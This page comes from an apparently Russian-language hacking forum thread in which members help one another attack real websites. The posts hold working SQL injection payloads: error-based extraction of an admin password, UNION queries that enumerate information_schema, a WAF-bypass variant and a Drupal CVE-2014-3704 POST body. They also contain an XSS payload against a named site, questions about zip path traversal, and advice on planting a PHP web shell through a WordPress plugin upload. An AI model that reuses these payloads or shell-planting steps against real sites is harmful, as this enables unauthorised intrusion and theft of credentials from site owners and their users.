Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    128
    Likes Received:
    5
    Reputations:
    1
    блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,683
    Likes Received:
    890
    Reputations:
    363
    SELECT mid(password,31,32) FROM oto_admin LIMIT 1
     
    _________________________
  3. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    128
    Likes Received:
    5
    Reputations:
    1

    спасибо)
     
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Данные векторы потихоньку уходят в прошлое. Если версия форка позволяет, используйте вектор с наибольшим количеством вывода символов (475! error-based через begint):
    Пример: https://forum.antichat.ru/showpost.php?p=3815102&postcount=23814
     
    #23824 YaBtr, 5 Feb 2015
    Last edited: 5 Feb 2015
  5. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    11
    Likes Received:
    6
    Reputations:
    2
    Есть уязвимый скрипт, который производит распаковку zip-архива, загруженного пользователем.
    Можно ли создать zip-архив, который бы распаковывался, например, на диреторию више ("../") ?
    Вроде видел пример создания такого архива, но не могу найти.
     
  6. izzy

    izzy New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    вопрос от начинающего
    база 5.0.95
    вот так вывожу таблицы http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables--
    нахожу нужную мне таблицу например у меня modx_active_users -
    делаю так http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name='modx_active_users'--
    и получаю такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'modx_active_users\\\'--' at line 1

    так как начинающий я непойму что делаю нетак!?
     
  7. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652

    Скорее всего magic_quotes_gpc = on

    Используйте hex или char.
     
  8. reuvenmatbil

    reuvenmatbil Member

    Joined:
    1 Sep 2012
    Messages:
    38
    Likes Received:
    5
    Reputations:
    0
    стоит фильтрация на ( и ). пробовал обойти с помощью urlencode — не вышло

    что предпринять можно?
     
    #23828 reuvenmatbil, 6 Feb 2015
    Last edited: 6 Feb 2015
  9. izzy

    izzy New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    большое спасибо помог - char
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,683
    Likes Received:
    890
    Reputations:
    363
    кроме ( и ) еще *, WAF на and. во всех полях ругался на кодировку, кроме 4. там и вывод номральный
    Code:
    partenaires/partenaires.cgi?CAT=1+|+1=0+union+select+1,2,3,table_name,5,6+from+information_schema.tables--+&PAYS=AF
     
    _________________________
    #23830 yarbabin, 6 Feb 2015
    Last edited: 6 Feb 2015
  11. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    308
    Likes Received:
    57
    Reputations:
    20
    Есть сайт со sqli (старая версия drupal) CVE-2014-3704

    Использовал следующие эксплоиты:

    http://www.exploit-db.com/exploits/34993/
    http://www.exploit-db.com/exploits/34992/
    http://www.exploit-db.com/exploits/34984/

    Но ни один не сработал, хотя и пишут, что новый пользователь был успешно создан.

    Как раскрутить я не знаю.

    Sqli при пост запросе:

    http://www.site.com/?q=node&destination=node

    name[0']=0;&name[0]=asd&pass=asd&test2=test&form_build_id=&form_id=user_login_block&op=Log%2Bin

    output:

     
    #23831 Vip77, 6 Feb 2015
    Last edited: 6 Feb 2015
  12. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    11
    Likes Received:
    6
    Reputations:
    2
    Ничего сложного, напиши мне по контактам в профиле, объясню.
     
    1 person likes this.
  13. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    308
    Likes Received:
    57
    Reputations:
    20
    Благодарю за помощь.
     
  14. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    При проверки на XSS сайт на экране "7" (не всплывающая)
    Code:
    chttp://www.mobilluck.com.ua/info.php?page=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
    2. Есть сайт с SQL но нет привилегий, а хэш пароля адимна самописный т.е не расшифруешь.. как в таком случае залить шел.
     
  15. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    а ты сам то как думаешь? :eek:
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,683
    Likes Received:
    890
    Reputations:
    363
    возможно WAF.

    обход авторизации? маловероятно, но попробуйте. стоит также рассмотреть и другие варианты уязвимостей
     
    _________________________
  17. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Я то думаю, что никак. Решил уточнить
    .. faza02, каким образом обойти авторизацию?
     
  18. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    есть админка вп 4.1 , доступно только установка плагина, шел грузится но не открывается
    почему то выдает
    грузу обычный пхп с евалом и echo , echo выводится, а при запросе /uploads/lit.php?e=phpinfo(); опять пишет сервер или файл не найдет.
    что в таком случае можно сделать?

    также рут в бд, но пути не раскрываются
     
    #23838 mazaxaka, 7 Feb 2015
    Last edited: 7 Feb 2015
  19. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    Ну, вообще-то если ты загружаешь плагин - то шелл будет не в папке uploads. Скачай готовый плагин, замени файл на шелл, загрузи и иди по примерно такому пути: site.com/wp-content/plugins/название_плагина/файл_с_шеллом.php.
     
  20. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    csrf например
     
Loading...
Thread Status:
Not open for further replies.